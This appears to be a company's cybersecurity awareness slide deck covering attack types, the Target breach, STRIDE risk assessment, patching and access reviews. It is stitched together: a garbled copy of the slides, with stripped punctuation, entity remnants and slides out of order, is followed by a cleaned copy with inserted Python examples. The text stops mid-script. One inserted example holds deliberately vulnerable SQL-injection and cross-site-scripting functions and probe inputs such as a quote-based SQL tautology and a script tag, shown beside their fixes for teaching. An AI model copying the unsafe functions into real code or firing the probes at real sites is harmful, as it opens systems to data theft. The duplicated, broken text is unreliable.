bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
PRIVILEGE MISUSE
• Internal parties act (maliciously or not) in a way that causes a breach
• Most actors are outside Executive Management and leadership roles
• While financial reasons still motivate most actors, espionage has become an increasingly common motivation
• Most breaches take months or longer to discover
Source: Verizon Data Breach Investigations Report 2016
CYBER-ESPIONAGE
• External parties (possibly state-affiliated or organized crime) infiltrating an organization's systems
• Attacks commonly begin through phishing and/or exploiting backdoors in software (browsers or even websites)
• Over 90% of breaches target trade secrets for exfiltration
Source: Verizon Data Breach Investigations Report 2016
CRIMEWARE
• Crimeware covers any malware or other incident that focuses directly on financial opportunity
• Ransomware, keyloggers and use of backdoors are the most common occurrences of Crimeware
• Crimeware is typically introduced through the following:
- Email Attachment
- Cross-site scripting from visited website
- Email Link
Source: Verizon Data Breach Investigations Report 2016
KEY CYBER ATTACKS IN THE NEWS
• Target Data Breach – 70 Million PII Records of Users and 40 Million Credit Cards Stolen
• Sony Attack – Malware attack that erased over half of the company's servers and PCs and released 4 unreleased movies and over 45,000 social security numbers
• Yahoo Data Breach (2013/2014) – August breach that exposed PII of 1 billion users; 2014 data breach of 500 million users; additional data loss in 2016
• Prepaid Card/ATM Scheme (2013) – $45 Million Stolen (worldwide)
• Bank of Bangladesh (February 2016) – $81 Million Stolen
COMPLEXITY BEHIND THE TARGET ATTACK
• Cyber attackers first attacked a third party vendor (the HVAC vendor) through use of malware introduced via a phishing campaign
• Used the HVAC vendor's stolen credentials to gain access to a third party website used for submitting electronic invoices
• Injected code into a vulnerability in the electronic submission process to gain further access to the Target internal network
• Performed reconnaissance on the environment and obtained domain administrator access
• Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location, working around firewalls and other defenses
• Gained access to a server that contained a SQL database and were able to download 70 million PII records of customers
• Attackers then gained access to the POS environment (which should have been walled off)
• Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
• Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
• Attackers then copied the credit card files to another server that had remote FTP ability and sent the files to themselves
RANSOMWARE – ANATOMY OF AN ATTACK
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach. The main reasons for companies' struggles are:
• Expansion of the attack surface
• Continued innovations in technology
• Lack of understanding of the company's information assets and the assets' value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
• Lack of skilled resources (people and time)
• Lack of funds
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE / TECHNOLOGY / PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best practice processes and associated management frameworks are in place. Regular audits and reviews are important.
IMPLEMENTING A CYBERSECURITY PROGRAM
• Understand the organizational risk and where high risk assets exist
• Risk assessments should be performed annually or when significant changes to the environment occur
• Stinnett uses Microsoft STRIDE Threat Modeling to semi-qualitatively measure cybersecurity risks, to identify, estimate and prioritize information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company's information assets.
• What Value Do the Assets Have?
- Credit Card Data
- Employee or Customer Records
- Bank Accounts
- Intellectual Property
- Trade Secrets
- Insider Knowledge
• Who Would Want the Data?
• Data Location
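The five assessment steps above (identify assets, locate them, classify them, threat-model them with STRIDE, calculate risk results) can be carried through on a small inventory. The following is an added example, not Stinnett's methodology or tooling: the 1-5 likelihood and impact scales, the classification-to-impact mapping, the risk bands and the three sample assets are all constructed assumptions.

```python
"""Semi-quantitative STRIDE risk scoring over an asset inventory.

Added illustration of the assessment steps on this page. Not Stinnett's own
method or code: the scales, the classification-to-impact mapping, the risk
bands and the sample assets below are constructed assumptions.
"""
from dataclasses import dataclass, field

# The six STRIDE threat categories from Microsoft's threat-modeling method.
STRIDE = ("Spoofing", "Tampering", "Repudiation", "Information disclosure",
          "Denial of service", "Elevation of privilege")

# Assumed classification scale: higher classification means higher impact (1-5).
CLASSIFICATION_IMPACT = {"public": 1, "internal": 2, "confidential": 4, "restricted": 5}


@dataclass
class Asset:
    name: str
    location: str          # where the asset lives (answers "Data Location")
    classification: str    # answers "What value do the assets have?"
    adversaries: list      # answers "Who would want the data?"
    # Assessed likelihood (1-5) that each STRIDE threat is realised; unlisted = 1.
    likelihood: dict = field(default_factory=dict)


def threat_scores(asset):
    """Return {threat: likelihood * impact} for every STRIDE category."""
    impact = CLASSIFICATION_IMPACT[asset.classification]
    return {t: asset.likelihood.get(t, 1) * impact for t in STRIDE}


def asset_risk(asset):
    """Overall asset risk = worst single STRIDE score (max), not the sum,
    so one severe threat is not hidden behind several low ones."""
    return max(threat_scores(asset).values())


def prioritize(assets):
    """Rank assets by risk, highest first, tie-broken by name for stable output."""
    return sorted(assets, key=lambda a: (-asset_risk(a), a.name))


def risk_band(score):
    """Map a 1-25 score to the band a report would show (assumed cut-offs)."""
    if score >= 15:
        return "HIGH"
    if score >= 8:
        return "MEDIUM"
    return "LOW"


# Constructed sample inventory.
SAMPLE_ASSETS = [
    Asset("Cardholder database", "DC1 / DB cluster", "restricted",
          ["organized crime"], {"Information disclosure": 4, "Elevation of privilege": 3}),
    Asset("HR records share", "Fileserver FS02", "confidential",
          ["insiders", "phishers"], {"Information disclosure": 3, "Spoofing": 3}),
    Asset("Marketing website", "Cloud web tier", "public",
          ["hacktivists"], {"Denial of service": 4, "Tampering": 3}),
]

if __name__ == "__main__":
    for a in prioritize(SAMPLE_ASSETS):
        s = asset_risk(a)
        print(f"{a.name:22} {a.location:18} risk={s:2} {risk_band(s)}")
```

Using the maximum STRIDE score rather than the sum is a deliberate choice: it keeps a single severe threat (say, disclosure of cardholder data) from being averaged away by five low ones, which is what the prioritization step needs.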
BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
CYBERSECURITY FAILURES AND FIXES
Patch Management – A Patch Management process is a company's strategy around ensuring the company's IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures, which includes:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process
User and Administrator level Access – Companies fail to adequately assess user access levels to ensure that the principle of Least Privilege is applied as much as possible. Within the IT department, the failure of Least Privilege can result in multiple individuals and IDs with access and/or knowledge of higher level functions within the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end user training around cybersecurity. Oftentimes the uneducated or untrained end user is the cyber attacker's first entry point into the company.
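The two patch-management failures above (exploits landing more than a year after the patch shipped, and not knowing which devices are on the network) both reduce to one question: for every device you know about, how long has an available patch gone uninstalled? Below is an added example of that check, not Stinnett's tooling: the CSV inventory format, the five devices, their dates and the one-year threshold are constructed assumptions, and the reference day is the presentation date.

```python
"""Patch-age triage over a device inventory.

Added example for the patch-management discussion on this page; not Stinnett's
tooling. The inventory format, the devices and the dates below are constructed.
The check flags devices whose outstanding vendor patch has been available for
more than a year (the gap the page cites) and orders internet-facing devices
first, as the page's "focus on higher risk areas" advice suggests.
"""
import csv
import io
from datetime import date

REFERENCE_DATE = date(2017, 10, 27)   # presentation date, used as "today"

# Constructed inventory: one row per device/software pair.
# patch_published = date the vendor released the fix that is still missing
# ("" when nothing is outstanding); last_patched = when the device was last updated.
INVENTORY_CSV = """\
device,software,internet_facing,patch_published,last_patched
web01,Apache httpd,yes,2016-03-01,2015-11-10
mail01,Exchange,yes,2017-09-12,2017-08-01
hr-fs02,Windows Server,no,2015-06-09,2015-01-20
kiosk03,Java Runtime,no,2016-01-19,2014-07-02
ws-acct1,Adobe Reader,no,,2017-10-01
"""


def load_inventory(text):
    """Parse the CSV into dicts, converting the flag and the ISO dates."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["internet_facing"] = row["internet_facing"].strip().lower() == "yes"
        row["patch_published"] = (date.fromisoformat(row["patch_published"])
                                  if row["patch_published"] else None)
        rows.append(row)
    return rows


def patch_age_days(row, today):
    """Days the missing patch has been available; 0 when nothing is outstanding."""
    if row["patch_published"] is None:
        return 0
    return (today - row["patch_published"]).days


def triage(rows, today, max_age_days=365):
    """Return overdue devices: internet-facing first, then oldest patch first."""
    overdue = [r for r in rows if patch_age_days(r, today) > max_age_days]
    return sorted(overdue,
                  key=lambda r: (not r["internet_facing"], -patch_age_days(r, today)))


def summarize(rows, today, max_age_days=365):
    """The counts a manager would ask for: total, overdue, overdue and exposed."""
    overdue = triage(rows, today, max_age_days)
    return {
        "devices": len(rows),
        "overdue": len(overdue),
        "overdue_internet_facing": sum(1 for r in overdue if r["internet_facing"]),
    }


if __name__ == "__main__":
    rows = load_inventory(INVENTORY_CSV)
    for r in triage(rows, REFERENCE_DATE):
        tag = "INTERNET-FACING" if r["internet_facing"] else "internal"
        print(f"{r['device']:10} {r['software']:16} {patch_age_days(r, REFERENCE_DATE):5}d  {tag}")
    print(summarize(rows, REFERENCE_DATE))
```

The second failure on the slide is the one this script cannot fix: a device that is not in the inventory never appears in the report, which is why the fixes slide starts with building the inventory.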
CYBERSECURITY FAILURES AND FIXES
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe, Java, Browsers, Operating Systems)
• Perform an inventory of all User and Admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end user training program
• Ensure backups and recovery plans work as intended and are properly segregated
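The ID-inventory fix above asks three things of every account: what access it has, why that access is necessary, and whether its password meets the length, character and change-interval parameters. The following added example (not Stinnett's tooling) runs that review over a constructed account list; the policy thresholds, the group names that count as elevated access and the four accounts are assumptions, and the review date is the presentation date.

```python
"""Account inventory review: least privilege and password parameters.

Added example for the "inventory of all User and Admin IDs" fix on this page;
not Stinnett's tooling. The account list, the admin group names and the policy
thresholds are constructed assumptions for illustration.
"""
from datetime import date, timedelta

REVIEW_DATE = date(2017, 10, 27)   # presentation date, used as "today"

# Assumed password policy a reviewer would compare against
# (the page's "password length, characters and change interval").
POLICY = {
    "min_length": 12,             # minimum password length
    "require_complexity": True,   # mixed character classes required
    "max_age_days": 90,           # change interval
}

# Assumed groups that confer elevated ("higher level") access.
ADMIN_GROUPS = {"Domain Admins", "Enterprise Admins", "DBA", "Local Admins"}

# Constructed account inventory. "justification" is what the owner wrote when
# asked why the access level is necessary; blank means nobody could say.
ACCOUNTS = [
    {"id": "jdoe", "groups": {"Domain Users"}, "justification": "accounting staff",
     "pw_last_set": date(2017, 9, 1), "pw_length": 14, "complex": True},
    {"id": "svc_backup", "groups": {"Domain Admins"}, "justification": "",
     "pw_last_set": date(2015, 2, 3), "pw_length": 8, "complex": False},
    {"id": "mgarcia", "groups": {"Domain Users", "DBA"}, "justification": "database administration",
     "pw_last_set": date(2017, 10, 1), "pw_length": 16, "complex": True},
    {"id": "tmp_vendor", "groups": {"Local Admins", "Domain Users"}, "justification": "",
     "pw_last_set": date(2017, 6, 1), "pw_length": 10, "complex": True},
]


def is_privileged(account):
    """True when the account sits in any group that grants elevated access."""
    return bool(account["groups"] & ADMIN_GROUPS)


def password_findings(account, today, policy=POLICY):
    """Return the policy parameters this account's password fails, in policy order."""
    findings = []
    if account["pw_length"] < policy["min_length"]:
        findings.append("length")
    if policy["require_complexity"] and not account["complex"]:
        findings.append("complexity")
    if today - account["pw_last_set"] > timedelta(days=policy["max_age_days"]):
        findings.append("age")
    return findings


def review(accounts, today, policy=POLICY):
    """One finding record per account that needs attention, privileged IDs first."""
    report = []
    for a in accounts:
        issues = password_findings(a, today, policy)
        # Least privilege: elevated access with no stated reason is itself a finding.
        if is_privileged(a) and not a["justification"].strip():
            issues.append("unjustified privileged access")
        if issues:
            report.append({"id": a["id"], "privileged": is_privileged(a), "issues": issues})
    return sorted(report, key=lambda r: (not r["privileged"], r["id"]))


if __name__ == "__main__":
    for r in review(ACCOUNTS, REVIEW_DATE):
        flag = "ADMIN" if r["privileged"] else "user"
        print(f"{r['id']:12} {flag:5} {', '.join(r['issues'])}")
```

Service and temporary vendor accounts are the usual offenders in a review like this: they were created for a task, given an admin group to make the task work, and never revisited, which is the "multiple IDs with access to higher level functions" outcome the failures slide describes.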
QUESTIONS
www.STINNETT-ASSOCIATES.com | 888.808.1795
Stinnett & Associates, 8811 S. Yale Ave., Suite 300
Tulsa, OK 74137
Main Number: 918.728.3300
ContactUs@Stinnett-Associates.com
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Information Technology (IT) – The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise. The department within a company that is charged with establishing, monitoring and maintaining information technology systems and services.
Operational Technology (OT) – The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA). OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).
Internet of Things – A computing concept that describes the idea of everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and being able to identify themselves to other devices, which enables the devices to collect and exchange data.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Bot – A bot is a software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.
Botnet – A number of Internet-connected devices (e.g. computers, DVR systems and other devices), each of which is running one or more bots after being infected with malware. Botnets can be used to perform Distributed Denial of Service attacks, steal data, send spam and allow the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals.
Denial of Service (DOS) and Distributed Denial of Service – A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations. Typically the computers being used are infected and part of a botnet.
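The difference between the two definitions above, one source flooding versus many infected sources flooding, is visible in a web server's own access log, which is where a defender usually first notices either. The following is an added detection example, not code from the page: the log lines are constructed (in the common log format Apache and nginx emit), and the ten-second window and the two thresholds are assumptions to be tuned per site.

```python
"""Flood detection over web-server access log lines (DoS versus DDoS).

Added example for the DoS / DDoS definitions on this page; not the page's own
code. The log lines, the window size and the thresholds are constructed. The
line format is the common log format that Apache and nginx write.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one source hammering "/", four sources hitting one path
# in the same two seconds, one normal visitor, and one unparseable line.
LOG_LINES = """\
192.0.2.10 - - [27/Oct/2017:10:00:01 -0500] "GET / HTTP/1.1" 200 512
203.0.113.7 - - [27/Oct/2017:10:00:02 -0500] "GET / HTTP/1.1" 200 512
203.0.113.7 - - [27/Oct/2017:10:00:03 -0500] "GET / HTTP/1.1" 200 512
203.0.113.7 - - [27/Oct/2017:10:00:04 -0500] "GET / HTTP/1.1" 200 512
203.0.113.7 - - [27/Oct/2017:10:00:05 -0500] "GET / HTTP/1.1" 200 512
203.0.113.7 - - [27/Oct/2017:10:00:06 -0500] "GET / HTTP/1.1" 200 512
203.0.113.7 - - [27/Oct/2017:10:00:07 -0500] "GET / HTTP/1.1" 200 512
198.51.100.1 - - [27/Oct/2017:10:00:11 -0500] "GET /search?q=a HTTP/1.1" 200 2048
198.51.100.2 - - [27/Oct/2017:10:00:11 -0500] "GET /search?q=a HTTP/1.1" 200 2048
198.51.100.3 - - [27/Oct/2017:10:00:12 -0500] "GET /search?q=a HTTP/1.1" 200 2048
198.51.100.4 - - [27/Oct/2017:10:00:12 -0500] "GET /search?q=a HTTP/1.1" 200 2048
192.0.2.10 - - [27/Oct/2017:10:01:30 -0500] "GET /about HTTP/1.1" 200 640
this line is not a log record and is skipped
"""


def parse_line(line):
    """Return (ip, timestamp, path) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT), m.group("path")


def requests_per_ip(events, window_seconds):
    """Peak number of requests any single IP made inside one sliding window."""
    by_ip = defaultdict(list)
    for ip, ts, _ in events:
        by_ip[ip].append(ts)
    peaks = {}
    for ip, times in by_ip.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        peaks[ip] = best
    return peaks


def detect(lines, window_seconds=10, per_ip_limit=5, distinct_ip_limit=3):
    """Flag single-source floods (DoS) and many-source floods on one path (DDoS)."""
    events = [e for e in (parse_line(l) for l in lines) if e]
    peaks = requests_per_ip(events, window_seconds)
    single = sorted(ip for ip, n in peaks.items() if n > per_ip_limit)
    # Distributed: many distinct IPs on the same path inside one time bucket.
    buckets = defaultdict(set)
    for ip, ts, path in events:
        buckets[(path, int(ts.timestamp()) // window_seconds)].add(ip)
    distributed = sorted({path for (path, _), ips in buckets.items()
                          if len(ips) >= distinct_ip_limit})
    return {"single_source": single, "distributed_paths": distributed}


if __name__ == "__main__":
    print(detect(LOG_LINES.splitlines()))
```

The single-source rule is easy to act on (block or rate-limit one address); the distributed one is not, because each bot looks like a legitimate visitor on its own, which is exactly why the page notes that botnets are what make DDoS effective.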
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Middleware – Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attacks – An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties. The attacker is able to alter or obtain data for themselves while unknown to the other two parties.
SQL Injection and Cross-site scripting Attacks – An attack occurrence where the attacker injects malicious code into a website. In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended. In Cross-site scripting the attacker injects code that only impacts other users of the website.
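Both definitions above, and the "Web App Attacks" slide earlier, come down to one coding mistake: untrusted input is pasted into a language (SQL, HTML) that then interprets it. The added example below shows the defect beside its fix for each; it is not code from the page, and the in-memory table, the two users and the two probe inputs are constructed.

```python
"""SQL injection and cross-site scripting: the defect beside the fix.

Added example for the SQL Injection / XSS definition and the "Web App Attacks"
slide on this page; not the page's own code. The table, the users and the probe
inputs are constructed. The *_unsafe functions are written the way vulnerable
code looks so the contrast with the fixed versions is visible.
"""
import html
import sqlite3


def make_db():
    """In-memory table with two constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "alice@example.com"), ("bob", "bob@example.com")])
    return conn


def find_user_unsafe(conn, name):
    """Defect: the untrusted value is pasted into the SQL text, so SQL syntax in
    the input becomes part of the query (the page's 'uses SQL language')."""
    sql = "SELECT name, email FROM users WHERE name = '%s'" % name
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name):
    """Fix: a parameterized query. The driver sends the value separately from
    the statement, so it can only ever be compared as data."""
    return conn.execute("SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()


def render_comment_unsafe(author, text):
    """Defect: user-supplied text is placed into HTML verbatim, so markup in it
    runs in every other visitor's browser (the page's 'impacts other users')."""
    return "<p><b>%s</b>: %s</p>" % (author, text)


def render_comment_safe(author, text):
    """Fix: escape on output so the browser shows the text instead of running it."""
    return "<p><b>%s</b>: %s</p>" % (html.escape(author), html.escape(text))


# Constructed probe inputs: one carrying SQL syntax, one carrying HTML markup.
SQL_PROBE = "x' OR '1'='1"
HTML_PROBE = "<script>alert(1)</script>"

if __name__ == "__main__":
    conn = make_db()
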